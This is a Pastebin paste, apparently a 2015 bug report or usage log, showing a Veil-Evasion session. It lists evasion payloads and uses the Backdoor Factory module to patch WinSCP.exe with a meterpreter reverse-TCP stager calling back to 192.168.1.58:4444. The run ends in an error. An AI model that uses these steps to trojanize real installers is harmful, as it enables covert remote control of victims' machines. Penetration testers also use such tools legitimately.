Advertisement
Guest User

Untitled

a guest
Apr 27th, 2015
544
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.51 KB | None | 0 0
  1. =========================================================================
  2. Veil-Evasion | [Version]: 2.19.1
  3. =========================================================================
  4. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  5. =========================================================================
  6.  
  7. Main Menu
  8.  
  9. 41 payloads loaded
  10.  
  11. Available commands:
  12.  
  13. use use a specific payload
  14. info information on a specific payload
  15. list list available payloads
  16. update update Veil to the latest version
  17. clean clean out payload folders
  18. checkvt check payload hashes vs. VirusTotal
  19. exit exit Veil
  20.  
  21. [>] Please enter a command: list
  22.  
  23.  
  24.  
  25.  
  26.  
  27. =========================================================================
  28. Veil-Evasion | [Version]: 2.19.1
  29. =========================================================================
  30. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  31. =========================================================================
  32.  
  33. [*] Available payloads:
  34.  
  35. 1) auxiliary/coldwar_wrapper
  36. 2) auxiliary/pyinstaller_wrapper
  37.  
  38. 3) c/meterpreter/rev_http
  39. 4) c/meterpreter/rev_http_service
  40. 5) c/meterpreter/rev_tcp
  41. 6) c/meterpreter/rev_tcp_service
  42. 7) c/shellcode_inject/flatc
  43.  
  44. 8) cs/meterpreter/rev_http
  45. 9) cs/meterpreter/rev_https
  46. 10) cs/meterpreter/rev_tcp
  47. 11) cs/shellcode_inject/base64_substitution
  48. 12) cs/shellcode_inject/virtual
  49.  
  50. 13) native/Hyperion
  51. 14) native/backdoor_factory
  52. 15) native/pe_scrambler
  53.  
  54. 16) powershell/meterpreter/rev_http
  55. 17) powershell/meterpreter/rev_https
  56. 18) powershell/meterpreter/rev_tcp
  57. 19) powershell/shellcode_inject/download_virtual
  58. 20) powershell/shellcode_inject/psexec_virtual
  59. 21) powershell/shellcode_inject/virtual
  60.  
  61. 22) python/meterpreter/bind_tcp
  62. 23) python/meterpreter/rev_http
  63. 24) python/meterpreter/rev_http_contained
  64. 25) python/meterpreter/rev_https
  65. 26) python/meterpreter/rev_https_contained
  66. 27) python/meterpreter/rev_tcp
  67. 28) python/shellcode_inject/aes_encrypt
  68. 29) python/shellcode_inject/arc_encrypt
  69. 30) python/shellcode_inject/base64_substitution
  70. 31) python/shellcode_inject/des_encrypt
  71. 32) python/shellcode_inject/download_inject
  72. 33) python/shellcode_inject/flat
  73. 34) python/shellcode_inject/letter_substitution
  74. 35) python/shellcode_inject/pidinject
  75.  
  76. 36) ruby/meterpreter/rev_http
  77. 37) ruby/meterpreter/rev_http_contained
  78. 38) ruby/meterpreter/rev_https
  79. 39) ruby/meterpreter/rev_https_contained
  80. 40) ruby/meterpreter/rev_tcp
  81. 41) ruby/shellcode_inject/flat
  82.  
  83. [>] Please enter a command: use 14
  84.  
  85. =========================================================================
  86. Veil-Evasion | [Version]: 2.19.1
  87. =========================================================================
  88. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  89. =========================================================================
  90.  
  91. Payload: native/backdoor_factory loaded
  92.  
  93.  
  94. Required Options:
  95.  
  96. Name Current Value Description
  97. ---- ------------- -----------
  98. LHOST 127.0.0.1 IP of the metasploit handler
  99. LPORT 4444 Port of the metasploit handler
  100. PATCH_METHOD Automatic Either Manual or Automatic. For use with payloads that have *_threaded in the name
  101. orig_exe WinSCP.exe PE or ELF executable to run through the Backdoor Factory
  102. payload reverse_tcp_stager_threaded PE or ELF: meter_tcp, rev_shell, custom | PE only meter_https
  103.  
  104. Available commands:
  105.  
  106. set set a specific option value
  107. info show information about the payload
  108. generate generate payload
  109. back go to the main menu
  110. exit exit Veil
  111.  
  112. [>] Please enter a command: set LHOST 192.168.1.58
  113. [>] Please enter a command: set LPORT 4444
  114. [>] Please enter a command: set payload meter_tcp
  115. [>] Please enter a command: generate
  116.  
  117. [*] Running The Backdoor Factory...
  118. [*] In the backdoor module
  119. [*] Checking if binary is supported
  120. [*] Gathering file info
  121. [*] Reading win32 entry instructions
  122. The following backdoors are available: (use -s)
  123. cave_miner_inline
  124. iat_reverse_tcp_inline
  125. iat_reverse_tcp_inline_threaded
  126. iat_reverse_tcp_stager_threaded
  127. iat_user_supplied_shellcode_threaded
  128. meterpreter_reverse_https_threaded
  129. reverse_shell_tcp_inline
  130. reverse_tcp_stager_threaded
  131. user_supplied_shellcode_threaded
  132.  
  133. Error during The Backdoor Factory execution
  134.  
  135.  
  136. [>] Press any key to return to the main menu:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement